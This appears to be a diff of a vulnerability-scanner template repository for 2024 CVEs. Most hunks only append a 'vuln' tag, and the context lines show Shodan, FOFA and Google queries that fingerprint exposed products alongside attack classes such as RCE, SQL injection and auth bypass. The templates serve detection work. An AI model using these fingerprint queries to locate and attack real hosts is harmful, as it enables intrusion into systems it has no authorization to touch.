@@ -23,7 +23,7 @@ info: vendor: salephpscripts product: web-directory-free publicwww-query: "/wp-content/plugins/web-directory-free" - tags: cve,cve2024,wordpress,wp-plugin,wp,lfi,web-directory-free + tags: cve,cve2024,wordpress,wp-plugin,wp,lfi,web-directory-free,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-36837.yaml b/http/cves/2024/CVE-2024-36837.yaml index 1dc3abd77d7..79a320392ab 100644 --- a/http/cves/2024/CVE-2024-36837.yaml +++ b/http/cves/2024/CVE-2024-36837.yaml @@ -19,7 +19,7 @@ info: vendor: crmeb product: crmeb fofa-query: title="CRMEB" - tags: cve,cve2024,crmeb,sqli + tags: cve,cve2024,crmeb,sqli,vuln variables: num: "{{rand_int(9000000, 9999999)}}" diff --git a/http/cves/2024/CVE-2024-36857.yaml b/http/cves/2024/CVE-2024-36857.yaml index dd058973f91..a4b618222f4 100644 --- a/http/cves/2024/CVE-2024-36857.yaml +++ b/http/cves/2024/CVE-2024-36857.yaml @@ -22,7 +22,7 @@ info: fofa-query: icon_hash="-165268926" vendor: homebrew product: jan - tags: cve,cve2024,jan,lfi,vkev + tags: cve,cve2024,jan,lfi,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-36858.yaml b/http/cves/2024/CVE-2024-36858.yaml index 5103805d0d6..a2f7b2ba855 100644 --- a/http/cves/2024/CVE-2024-36858.yaml +++ b/http/cves/2024/CVE-2024-36858.yaml @@ -20,7 +20,7 @@ info: vendor: homebrew product: jan fofa-query: icon_hash="-165268926" - tags: cve,cve2024,totolink,unauth,intrusive,vkev + tags: cve,cve2024,totolink,unauth,intrusive,vkev,vuln variables: filename: "{{to_lower(rand_text_alpha(6))}}" diff --git a/http/cves/2024/CVE-2024-36991.yaml b/http/cves/2024/CVE-2024-36991.yaml index c7f34eb401d..f6fd6b08536 100644 --- a/http/cves/2024/CVE-2024-36991.yaml +++ b/http/cves/2024/CVE-2024-36991.yaml @@ -17,7 +17,7 @@ info: verified: true max-request: 1 shodan-query: html:"Login | Splunk" - tags: cve,cve2024,splunk,lfi,vkev + tags: cve,cve2024,splunk,lfi,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-37032.yaml b/http/cves/2024/CVE-2024-37032.yaml index 98185b1bb2a..55633288bc3 100644 --- a/http/cves/2024/CVE-2024-37032.yaml +++ b/http/cves/2024/CVE-2024-37032.yaml @@ -20,7 +20,7 @@ info: vendor: ollama product: ollama shodan-query: ollama - tags: cve,cve2024,ollama,rce,vkev + tags: cve,cve2024,ollama,rce,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-37152.yaml b/http/cves/2024/CVE-2024-37152.yaml index 6445eabebc3..065944ebe0c 100644 --- a/http/cves/2024/CVE-2024-37152.yaml +++ b/http/cves/2024/CVE-2024-37152.yaml @@ -19,7 +19,7 @@ info: vendor: argoproj product: argo_cd shodan-query: html:"Argo CD" - tags: cve,cve2024,argo-cd,info-leak + tags: cve,cve2024,argo-cd,info-leak,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-37393.yaml b/http/cves/2024/CVE-2024-37393.yaml index 7189f0698b4..a51d065104f 100644 --- a/http/cves/2024/CVE-2024-37393.yaml +++ b/http/cves/2024/CVE-2024-37393.yaml @@ -16,7 +16,7 @@ info: verified: true shodan-query: title:"SecurEnvoy" fofa-query: title="SecurEnvoy" - tags: cve,cve2024,securenvoy,ldap + tags: cve,cve2024,securenvoy,ldap,vuln variables: userid: "{{to_lower(rand_base(20))}}" diff --git a/http/cves/2024/CVE-2024-3742.yaml b/http/cves/2024/CVE-2024-3742.yaml index 3f152e09dea..a56ddb20130 100644 --- a/http/cves/2024/CVE-2024-3742.yaml +++ b/http/cves/2024/CVE-2024-3742.yaml @@ -22,7 +22,7 @@ info: verified: true max-request: 1 fofa-query: "Electrolink s.r.l." - tags: packetstorm,cve,cve2024,electrolink,info-leak + tags: packetstorm,cve,cve2024,electrolink,info-leak,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-3753.yaml b/http/cves/2024/CVE-2024-3753.yaml index 76e7858ccc0..5a342ae2368 100644 --- a/http/cves/2024/CVE-2024-3753.yaml +++ b/http/cves/2024/CVE-2024-3753.yaml @@ -26,7 +26,7 @@ info: fofa-query: body="/wp-content/plugins/hostel" publicwww-query: /wp-content/plugins/hostel/ shodan-query: http.html:"/wp-content/plugins/hostel/" - tags: cve,cve2024,wp,wordpress,wp-plugin,hostel,xss + tags: cve,cve2024,wp,wordpress,wp-plugin,hostel,xss,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-37728.yaml b/http/cves/2024/CVE-2024-37728.yaml index 251912360f6..f35a8e35e99 100644 --- a/http/cves/2024/CVE-2024-37728.yaml +++ b/http/cves/2024/CVE-2024-37728.yaml @@ -20,7 +20,7 @@ info: verified: true max-request: 1 shodan-query: "OfficeWeb365" - tags: cve,cve2024,officeweb365,lfi + tags: cve,cve2024,officeweb365,lfi,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-37843.yaml b/http/cves/2024/CVE-2024-37843.yaml index 1bcc01def7e..326c8a698eb 100644 --- a/http/cves/2024/CVE-2024-37843.yaml +++ b/http/cves/2024/CVE-2024-37843.yaml @@ -29,7 +29,7 @@ info: - body=craftcms - icon_hash=-47932290 publicwww-query: craftcms - tags: cve,cve2024,craftcms,sqli + tags: cve,cve2024,craftcms,sqli,vuln variables: matcher: "{{rand_base(4)}}" diff --git a/http/cves/2024/CVE-2024-37881.yaml b/http/cves/2024/CVE-2024-37881.yaml index ace5e9c3b84..61d0d67e637 100644 --- a/http/cves/2024/CVE-2024-37881.yaml +++ b/http/cves/2024/CVE-2024-37881.yaml @@ -18,7 +18,7 @@ info: verified: true max-request: 1 publicwww-query: "/wp-content/plugins/siteguard/" - tags: cve,cve-2024,siteguard,wp-plugin + tags: cve,cve-2024,siteguard,wp-plugin,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-3822.yaml b/http/cves/2024/CVE-2024-3822.yaml index b0bbea1ac39..eb58e1c03e0 100644 --- a/http/cves/2024/CVE-2024-3822.yaml +++ b/http/cves/2024/CVE-2024-3822.yaml @@ -21,7 +21,7 @@ info: verified: true max-request: 1 fofa-query: "wp-content/plugins/base64-encoderdecoder/" - tags: cve,cve2024,wordpress,wp-plugin,wp,xss,base64-encoderdecoder + tags: cve,cve2024,wordpress,wp-plugin,wp,xss,base64-encoderdecoder,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-38288.yaml b/http/cves/2024/CVE-2024-38288.yaml index 0e131a53233..e61d4232c39 100644 --- a/http/cves/2024/CVE-2024-38288.yaml +++ b/http/cves/2024/CVE-2024-38288.yaml @@ -19,7 +19,7 @@ info: shodan-query: html:"TurboMeeting" product: turbomeeting vendor: rhubcom - tags: cve,cve2024,rce,turbomeeting,authenticated + tags: cve,cve2024,rce,turbomeeting,authenticated,vuln variables: username: "{{username}}" diff --git a/http/cves/2024/CVE-2024-38289.yaml b/http/cves/2024/CVE-2024-38289.yaml index 3a6a7d32b0c..86ccf95673c 100644 --- a/http/cves/2024/CVE-2024-38289.yaml +++ b/http/cves/2024/CVE-2024-38289.yaml @@ -18,7 +18,7 @@ info: vendor: rhubcom product: turbomeeting shodan-query: html:"TurboMeeting" - tags: cve,cve2024,sqli,turbomeeting,vkev + tags: cve,cve2024,sqli,turbomeeting,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-38353.yaml b/http/cves/2024/CVE-2024-38353.yaml index b4263c554f1..787af7a13aa 100644 --- a/http/cves/2024/CVE-2024-38353.yaml +++ b/http/cves/2024/CVE-2024-38353.yaml @@ -25,7 +25,7 @@ info: verified: true max-request: 1 shodan-query: html:"CodiMD" - tags: cve,cve2024,file-upload,intrusive,codimd + tags: cve,cve2024,file-upload,intrusive,codimd,vuln variables: filename: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cves/2024/CVE-2024-38472.yaml b/http/cves/2024/CVE-2024-38472.yaml index 4e3c5dd3531..47cf9a32f6d 100644 --- a/http/cves/2024/CVE-2024-38472.yaml +++ b/http/cves/2024/CVE-2024-38472.yaml @@ -19,7 +19,7 @@ info: cwe-id: CWE-918 epss-score: 0.89753 epss-percentile: 0.99534 - tags: cve,cve2024,apache,ssrf,oast,httpd + tags: cve,cve2024,apache,ssrf,oast,httpd,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-38473.yaml b/http/cves/2024/CVE-2024-38473.yaml index 8b68962dac3..be27e07bd3c 100644 --- a/http/cves/2024/CVE-2024-38473.yaml +++ b/http/cves/2024/CVE-2024-38473.yaml @@ -27,7 +27,7 @@ info: vendor: Apache Software Foundation product: Apache HTTP Server google-query: intitle:"Apache HTTP Server" inurl:"/server-status" - tags: cve,cve2024,apache,acl-bypass,mod_proxy,php-fpm + tags: cve,cve2024,apache,acl-bypass,mod_proxy,php-fpm,vuln flow: | http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-38475.yaml b/http/cves/2024/CVE-2024-38475.yaml index 392c34c32a8..8ab91d5b281 100644 --- a/http/cves/2024/CVE-2024-38475.yaml +++ b/http/cves/2024/CVE-2024-38475.yaml @@ -21,7 +21,7 @@ info: verified: true max-request: 1 shodan-query: html:"SonicWall" html:"SMA" - tags: cve,cve2024,sonicwal,sma-100,lfi,kev,vkev + tags: cve,cve2024,sonicwal,sma-100,lfi,kev,vkev,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-3848.yaml b/http/cves/2024/CVE-2024-3848.yaml index 3f66125f57c..8fdec18eb44 100644 --- a/http/cves/2024/CVE-2024-3848.yaml +++ b/http/cves/2024/CVE-2024-3848.yaml @@ -31,7 +31,7 @@ info: - title="mlflow" - app="mlflow" google-query: intitle:"mlflow" - tags: cve,cve2024,mlflow,lfi,intrusive,lfprojects + tags: cve,cve2024,mlflow,lfi,intrusive,lfprojects,vuln variables: random: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cves/2024/CVE-2024-3850.yaml b/http/cves/2024/CVE-2024-3850.yaml index a78f0020f54..4b23ee511a9 100644 --- a/http/cves/2024/CVE-2024-3850.yaml +++ b/http/cves/2024/CVE-2024-3850.yaml @@ -27,7 +27,7 @@ info: vendor: Uniview product: NVR301-04S2-P4 fofa-query: title="NVR301-04-P4" - tags: cve,cve2024,xss,uniview,nvr + tags: cve,cve2024,xss,uniview,nvr,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-38514.yaml b/http/cves/2024/CVE-2024-38514.yaml index 441cf6573d4..08071d85312 100644 --- a/http/cves/2024/CVE-2024-38514.yaml +++ b/http/cves/2024/CVE-2024-38514.yaml @@ -22,7 +22,7 @@ info: verified: true max-request: 1 shodan-query: "title:NextChat,\"ChatGPT Next Web\"" - tags: cve,cve2024,ssrf,xss,chatgpt,nextchat,vkev + tags: cve,cve2024,ssrf,xss,chatgpt,nextchat,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-38653.yaml b/http/cves/2024/CVE-2024-38653.yaml index b9ab5bf0ab6..3587f59d6c0 100644 --- a/http/cves/2024/CVE-2024-38653.yaml +++ b/http/cves/2024/CVE-2024-38653.yaml @@ -22,7 +22,7 @@ info: max-request: 1 vendor: ivanti product: avalanche - tags: cve,cve2024,intrusive,ivanti,avalanche,xxe,vkev + tags: cve,cve2024,intrusive,ivanti,avalanche,xxe,vkev,vuln variables: filename: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cves/2024/CVE-2024-38816.yaml b/http/cves/2024/CVE-2024-38816.yaml index 2b0621a1a84..91d3334cd4d 100644 --- a/http/cves/2024/CVE-2024-38816.yaml +++ b/http/cves/2024/CVE-2024-38816.yaml @@ -15,9 +15,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-38816 - epss-score: 0.93631 - epss-percentile: 0.99829 - tags: cve,cve2024,spring,vkev + epss-score: 0.93653 + epss-percentile: 0.9983 + tags: cve,cve2024,spring,vkev,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-38856.yaml b/http/cves/2024/CVE-2024-38856.yaml index 3423d6c8dca..6c0c4a46581 100644 --- a/http/cves/2024/CVE-2024-38856.yaml +++ b/http/cves/2024/CVE-2024-38856.yaml @@ -29,7 +29,7 @@ info: shodan-query: 'title:"OFBiz"' product: ofbiz vendor: apache - tags: cve,cve2024,apache,ofbiz,rce,kev,vkev + tags: cve,cve2024,apache,ofbiz,rce,kev,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-3922.yaml b/http/cves/2024/CVE-2024-3922.yaml index 49a25a554cc..d1532ffeaa4 100644 --- a/http/cves/2024/CVE-2024-3922.yaml +++ b/http/cves/2024/CVE-2024-3922.yaml @@ -23,7 +23,7 @@ info: vendor: wedevs product: dokan publicwww-query: "/wp-content/plugins/dokan-pro/" - tags: time-based-sqli,cve,cve2024,dokan,wp-plugin,wordpress,wp,dokan-pro,sqli + tags: time-based-sqli,cve,cve2024,dokan,wp-plugin,wordpress,wp,dokan-pro,sqli,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2024/CVE-2024-39250.yaml b/http/cves/2024/CVE-2024-39250.yaml index 927877aa1ee..03a7a223ae2 100644 --- a/http/cves/2024/CVE-2024-39250.yaml +++ b/http/cves/2024/CVE-2024-39250.yaml @@ -18,7 +18,7 @@ info: vendor: efroTech product: timetrax fofa-query: icon_hash="-661694518" - tags: cve,cve2024,sqli,timetrax + tags: cve,cve2024,sqli,timetrax,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-39713.yaml b/http/cves/2024/CVE-2024-39713.yaml index a35dbedc612..123960bc43e 100644 --- a/http/cves/2024/CVE-2024-39713.yaml +++ b/http/cves/2024/CVE-2024-39713.yaml @@ -24,7 +24,7 @@ info: shodan-query: http.title:"rocket.chat" fofa-query: title="rocket.chat" google-query: intitle:"rocket.chat" - tags: cve,cve2024,hackerone,ssrf,oast,rocket-chat,vkev + tags: cve,cve2024,hackerone,ssrf,oast,rocket-chat,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-39887.yaml b/http/cves/2024/CVE-2024-39887.yaml index b5fa114bc7c..b43f043ef2c 100644 --- a/http/cves/2024/CVE-2024-39887.yaml +++ b/http/cves/2024/CVE-2024-39887.yaml @@ -30,7 +30,7 @@ info: fofa-query: - body="apache superset" - icon_hash=1582430156 - tags: cve,cve2024,apache,superset,sqli,authenticated + tags: cve,cve2024,apache,superset,sqli,authenticated,vuln variables: marker: "{{randstr}}" diff --git a/http/cves/2024/CVE-2024-39903.yaml b/http/cves/2024/CVE-2024-39903.yaml index a79036af35e..98b85a3e566 100644 --- a/http/cves/2024/CVE-2024-39903.yaml +++ b/http/cves/2024/CVE-2024-39903.yaml @@ -21,7 +21,7 @@ info: fofa-query: icon_hash="-223126228" verified: true max-request: 1 - tags: cve,cve2024,solara,lfi + tags: cve,cve2024,solara,lfi,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-39907.yaml b/http/cves/2024/CVE-2024-39907.yaml index 3f904061379..db5c29b4abb 100644 --- a/http/cves/2024/CVE-2024-39907.yaml +++ b/http/cves/2024/CVE-2024-39907.yaml @@ -22,7 +22,7 @@ info: fofa-query: icon_hash="1300107149" || icon_hash="1453309674" || cert.issuer.cn="1Panel Intermediate CA" product: 1panel vendor: fit2cloud - tags: cve,cve2024,sqli,1panel,authenticated + tags: cve,cve2024,sqli,1panel,authenticated,vuln variables: username: "{{username}}" diff --git a/http/cves/2024/CVE-2024-39914.yaml b/http/cves/2024/CVE-2024-39914.yaml index a3c063e1682..051204d1f2a 100644 --- a/http/cves/2024/CVE-2024-39914.yaml +++ b/http/cves/2024/CVE-2024-39914.yaml @@ -23,7 +23,7 @@ info: vendor: fogproject product: fogproject fofa-query: icon_hash="-1952619005" - tags: cve,cve2024,rce,fog,vkev + tags: cve,cve2024,rce,fog,vkev,vuln variables: filename: "{{to_lower(rand_text_alpha(12))}}" diff --git a/http/cves/2024/CVE-2024-40348.yaml b/http/cves/2024/CVE-2024-40348.yaml index b0cb0a9557b..d491e312880 100644 --- a/http/cves/2024/CVE-2024-40348.yaml +++ b/http/cves/2024/CVE-2024-40348.yaml @@ -19,7 +19,7 @@ info: vendor: morpheus65535 product: bazarr fofa-query: title=="Bazarr" && icon_hash="-1983413099" - tags: cve,cve2024,bazarr,lfi + tags: cve,cve2024,bazarr,lfi,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-4040.yaml b/http/cves/2024/CVE-2024-4040.yaml index 0d4e1b1f978..d96f259e896 100644 --- a/http/cves/2024/CVE-2024-4040.yaml +++ b/http/cves/2024/CVE-2024-4040.yaml @@ -32,7 +32,7 @@ info: - "html:\"CrushFTP\"" - http.html:"crushftp" fofa-query: "body=\"crushftp\"" - tags: cve,cve2024,lfr,crushftp,vfs,kev,vkev + tags: cve,cve2024,lfr,crushftp,vfs,kev,vkev,vuln flow: | if ( !template.hasOwnProperty('username') || !template.hasOwnProperty('password') ) { // if username or password is not provided, run unauthenticated exploit diff --git a/http/cves/2024/CVE-2024-40422.yaml b/http/cves/2024/CVE-2024-40422.yaml index f7dd6e74fa5..f1ab8d2b2cc 100644 --- a/http/cves/2024/CVE-2024-40422.yaml +++ b/http/cves/2024/CVE-2024-40422.yaml @@ -25,7 +25,7 @@ info: vendor: stitionai product: devika fofa-query: icon_hash="-1429839495" - tags: cve,cve2024,devika,lfi + tags: cve,cve2024,devika,lfi,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-40711.yaml b/http/cves/2024/CVE-2024-40711.yaml index d2f90bf2688..ecb4b5eb79b 100644 --- a/http/cves/2024/CVE-2024-40711.yaml +++ b/http/cves/2024/CVE-2024-40711.yaml @@ -21,7 +21,7 @@ info: verified: true max-request: 1 shodan-query: html:"Veeam Backup" - tags: cve,cve2024,veeam,backup,unauth,passive,kev,vkev + tags: cve,cve2024,veeam,backup,unauth,passive,kev,vkev,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-41107.yaml b/http/cves/2024/CVE-2024-41107.yaml index 79916f23861..02746032282 100644 --- a/http/cves/2024/CVE-2024-41107.yaml +++ b/http/cves/2024/CVE-2024-41107.yaml @@ -22,7 +22,7 @@ info: fofa-query: app="APACHE-CloudStack" product: cloudstack vendor: apache - tags: cve,cve2024,apache,cloudstack,auth-bypass + tags: cve,cve2024,apache,cloudstack,auth-bypass,vuln variables: username: "{{username}}" diff --git a/http/cves/2024/CVE-2024-41628.yaml b/http/cves/2024/CVE-2024-41628.yaml index 61dbffbe2bd..b011ec14470 100644 --- a/http/cves/2024/CVE-2024-41628.yaml +++ b/http/cves/2024/CVE-2024-41628.yaml @@ -24,7 +24,7 @@ info: vendor: severalnines product: cluster_control fofa-query: icon_hash="160707013" || icon_hash="-1815707560" - tags: cve,cve2024,severalnines,cluster-control,lfi + tags: cve,cve2024,severalnines,cluster-control,lfi,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-41667.yaml b/http/cves/2024/CVE-2024-41667.yaml index 7cd4c465bde..a5e4d2b22d6 100644 --- a/http/cves/2024/CVE-2024-41667.yaml +++ b/http/cves/2024/CVE-2024-41667.yaml @@ -21,7 +21,7 @@ info: metadata: max-request: 12 verified: true - tags: cve,cve2024,intrusive,openam,ssti,authenticated + tags: cve,cve2024,intrusive,openam,ssti,authenticated,vuln flow: http(1) && http(2) && http(3) && http(4) && http(5) && http(6) && http(7) && http(8) && http(9) && http(10) && http(11) && http(12) diff --git a/http/cves/2024/CVE-2024-41713.yaml b/http/cves/2024/CVE-2024-41713.yaml index 69136d1c1df..ed5ffd94084 100644 --- a/http/cves/2024/CVE-2024-41713.yaml +++ b/http/cves/2024/CVE-2024-41713.yaml @@ -24,7 +24,7 @@ info: product: cmg_suite shodan-query: http.html:"Mitel Networks" fofa-query: body="mitel networks" - tags: cve,cve204,mitel,cmg-suite,auth-bypass,kev,vkev + tags: cve,cve204,mitel,cmg-suite,auth-bypass,kev,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-41810.yaml b/http/cves/2024/CVE-2024-41810.yaml index 08846fa435b..ae2393f8d7a 100644 --- a/http/cves/2024/CVE-2024-41810.yaml +++ b/http/cves/2024/CVE-2024-41810.yaml @@ -20,7 +20,7 @@ info: max-request: 2 shodan-query: html:'Twisted' html:"python" fofa-query: body="twisted" && "python" - tags: xss,redirect,twisted,python + tags: xss,redirect,twisted,python,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-41955.yaml b/http/cves/2024/CVE-2024-41955.yaml index d5763984ef5..531189850b0 100644 --- a/http/cves/2024/CVE-2024-41955.yaml +++ b/http/cves/2024/CVE-2024-41955.yaml @@ -26,7 +26,7 @@ info: vendor: mobsf product: mobsf fofa-query: "MobSF" - tags: cve,cve2024,open-redirect,mobsf,authenticated + tags: cve,cve2024,open-redirect,mobsf,authenticated,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-42009.yaml b/http/cves/2024/CVE-2024-42009.yaml index 2b943b1f877..cd08171726e 100644 --- a/http/cves/2024/CVE-2024-42009.yaml +++ b/http/cves/2024/CVE-2024-42009.yaml @@ -27,7 +27,7 @@ info: max-request: 1 shodan-query: cpe:"cpe:2.3:a:roundcube:webmail" fofa-query: "roundcube_sessid" - tags: cve,cve2024,roundcube,xss,vkev,passive,kev + tags: cve,cve2024,roundcube,xss,vkev,passive,kev,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-4257.yaml b/http/cves/2024/CVE-2024-4257.yaml index adb3fbc60e5..2af05008589 100644 --- a/http/cves/2024/CVE-2024-4257.yaml +++ b/http/cves/2024/CVE-2024-4257.yaml @@ -21,7 +21,7 @@ info: verified: true max-request: 1 fofa-query: app="LANWON-临床浏览系统" - tags: time-based-sqli,cve,cve2024,sqli,blunet + tags: time-based-sqli,cve,cve2024,sqli,blunet,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-42640.yaml b/http/cves/2024/CVE-2024-42640.yaml index 13bf593f846..788ca41215c 100644 --- a/http/cves/2024/CVE-2024-42640.yaml +++ b/http/cves/2024/CVE-2024-42640.yaml @@ -20,7 +20,7 @@ info: epss-percentile: 0.9948 metadata: max-request: 4 - tags: cve,cve2024,angular,rce,vkev + tags: cve,cve2024,angular,rce,vkev,vuln variables: filename: "{{to_lower(rand_text_alpha(12))}}" diff --git a/http/cves/2024/CVE-2024-42852.yaml b/http/cves/2024/CVE-2024-42852.yaml index 5e7f6972ec6..d1c9d5fdee9 100644 --- a/http/cves/2024/CVE-2024-42852.yaml +++ b/http/cves/2024/CVE-2024-42852.yaml @@ -28,7 +28,7 @@ info: product: acutoweb fofa-query: title="AcuToWeb" shodan-query: title:"AcuToWeb" - tags: cve,cve2024,xss,acutoweb,opentext,vkev + tags: cve,cve2024,xss,acutoweb,opentext,vkev,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-4295.yaml b/http/cves/2024/CVE-2024-4295.yaml index 1509e6497dd..6b2d12c4b01 100644 --- a/http/cves/2024/CVE-2024-4295.yaml +++ b/http/cves/2024/CVE-2024-4295.yaml @@ -29,7 +29,7 @@ info: max-request: 1 publicwww-query: "/wp-content/plugins/email-subscribers/" fofa-query: body="/wp-content/plugins/email-subscribers/" - tags: time-based-sqli,cve,cve2024,wordpress,wp-plugin,wp,email-subscribers,sqli,vkev + tags: time-based-sqli,cve,cve2024,wordpress,wp-plugin,wp,email-subscribers,sqli,vkev,vuln variables: contact_id: "{{contact_id}}" diff --git a/http/cves/2024/CVE-2024-43160.yaml b/http/cves/2024/CVE-2024-43160.yaml index 6be065901e1..7fdde2ed1b8 100644 --- a/http/cves/2024/CVE-2024-43160.yaml +++ b/http/cves/2024/CVE-2024-43160.yaml @@ -24,7 +24,7 @@ info: product: BerqWP framework: wordpress publicwww-query: "/wp-content/plugins/searchpro" - tags: cve,cve2024,file-upload,shell,intrusive,wp,wp-plugin,wordpress,searchpro + tags: cve,cve2024,file-upload,shell,intrusive,wp,wp-plugin,wordpress,searchpro,vuln variables: filename: "{{rand_base(12)}}" diff --git a/http/cves/2024/CVE-2024-4325.yaml b/http/cves/2024/CVE-2024-4325.yaml index 6967b9c8811..0a27a3581bc 100644 --- a/http/cves/2024/CVE-2024-4325.yaml +++ b/http/cves/2024/CVE-2024-4325.yaml @@ -30,7 +30,7 @@ info: - body="__gradio_mode__" - title="gradio" google-query: intitle:"gradio" - tags: cve,cve2024,gradio,ssrf,cloud,oast,vkev + tags: cve,cve2024,gradio,ssrf,cloud,oast,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-43360.yaml b/http/cves/2024/CVE-2024-43360.yaml index b71793c0865..f0d54344ceb 100644 --- a/http/cves/2024/CVE-2024-43360.yaml +++ b/http/cves/2024/CVE-2024-43360.yaml @@ -24,7 +24,7 @@ info: vendor: zoneminder product: zoneminder fofa-query: icon_hash="-1218152116" - tags: cve,cve2024,zoneminder,sqli,vkev + tags: cve,cve2024,zoneminder,sqli,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-43425.yaml b/http/cves/2024/CVE-2024-43425.yaml index d6bc37f6f00..a727196cb96 100644 --- a/http/cves/2024/CVE-2024-43425.yaml +++ b/http/cves/2024/CVE-2024-43425.yaml @@ -23,7 +23,7 @@ info: shodan-query: title:"Moodle" product: moodle vendor: moodle - tags: cve,cve2024,moodile,rce,authenticated + tags: cve,cve2024,moodile,rce,authenticated,vuln flow: http(1) && http(2) && http(3) && http(4) && http(5) && http(6) diff --git a/http/cves/2024/CVE-2024-43441.yaml b/http/cves/2024/CVE-2024-43441.yaml index 9438820248f..dffb83d6307 100644 --- a/http/cves/2024/CVE-2024-43441.yaml +++ b/http/cves/2024/CVE-2024-43441.yaml @@ -29,7 +29,7 @@ info: vendor: apache product: hugegraph fofa-query: title="HugeGraph" - tags: cve,cve2024,hugegraph,auth-bypass,apache + tags: cve,cve2024,hugegraph,auth-bypass,apache,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-4348.yaml b/http/cves/2024/CVE-2024-4348.yaml index df6390b3f30..4ce63489635 100644 --- a/http/cves/2024/CVE-2024-4348.yaml +++ b/http/cves/2024/CVE-2024-4348.yaml @@ -26,7 +26,7 @@ info: shodan-query: html:"osCommerce" product: oscommerce vendor: oscommerce - tags: packetstorm,xss,rxss,oscommerce,cve2024,cve + tags: packetstorm,xss,rxss,oscommerce,cve2024,cve,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-4358.yaml b/http/cves/2024/CVE-2024-4358.yaml index 6d2a63fca56..e3adea2fea2 100644 --- a/http/cves/2024/CVE-2024-4358.yaml +++ b/http/cves/2024/CVE-2024-4358.yaml @@ -22,7 +22,7 @@ info: shodan-query: title:"Log in | Telerik Report Server" product: telerik_report_server vendor: progress - tags: cve,cve2024,telerik,progress,auth-bypass,instrusive,kev,vkev + tags: cve,cve2024,telerik,progress,auth-bypass,instrusive,kev,vkev,vuln variables: user: "{{rand_base(6)}}" pass: "{{rand_base(8)}}" diff --git a/http/cves/2024/CVE-2024-43917.yaml b/http/cves/2024/CVE-2024-43917.yaml index d29762536e2..245faa88550 100644 --- a/http/cves/2024/CVE-2024-43917.yaml +++ b/http/cves/2024/CVE-2024-43917.yaml @@ -26,7 +26,7 @@ info: framework: wordpress fofa-query: body="/wp-content/plugins/ti-woocommerce-wishlist/" publicwww-query: "/wp-content/plugins/ti-woocommerce-wishlist/" - tags: time-based-sqli,cve,cve2024,wp,wordpress,ti-woocommerce-wishlist,wp-plugin,sqli,vkev + tags: time-based-sqli,cve,cve2024,wp,wordpress,ti-woocommerce-wishlist,wp-plugin,sqli,vkev,vuln flow: http(1) && http(2) && http(3) && http(4) diff --git a/http/cves/2024/CVE-2024-43919.yaml b/http/cves/2024/CVE-2024-43919.yaml index 0500bc3d944..82884625ecd 100644 --- a/http/cves/2024/CVE-2024-43919.yaml +++ b/http/cves/2024/CVE-2024-43919.yaml @@ -26,7 +26,7 @@ info: product: yet_another_related_posts_plugin framework: wordpress fofa-query: body="wp-content/plugins/yet-another-related-posts-plugin/" - tags: cve,cve2024,wp,wordpress,wp-plugin,auth-bypass,yet-another-related-posts-plugin + tags: cve,cve2024,wp,wordpress,wp-plugin,auth-bypass,yet-another-related-posts-plugin,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-4399.yaml b/http/cves/2024/CVE-2024-4399.yaml index 878d6ade676..8debe2c41ba 100644 --- a/http/cves/2024/CVE-2024-4399.yaml +++ b/http/cves/2024/CVE-2024-4399.yaml @@ -20,7 +20,7 @@ info: max-request: 2 product: cas fofa-query: body="wp-content/themes/cas/" - tags: cve,cve2024,wp,wordpress,wp-theme,ssrf,cas,oast + tags: cve,cve2024,wp,wordpress,wp-theme,ssrf,cas,oast,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-44000.yaml b/http/cves/2024/CVE-2024-44000.yaml index 3a992e176d0..32f01ec9d5a 100644 --- a/http/cves/2024/CVE-2024-44000.yaml +++ b/http/cves/2024/CVE-2024-44000.yaml @@ -26,7 +26,7 @@ info: product: liteSpeed-cache framework: wordpress publicwww-query: "/wp-content/plugins/litespeed-cache" - tags: cve,cve2024,info-leak,takeover,wordpress,wp-plugin,litespeed-cache,wp,vkev + tags: cve,cve2024,info-leak,takeover,wordpress,wp-plugin,litespeed-cache,wp,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-4434.yaml b/http/cves/2024/CVE-2024-4434.yaml index 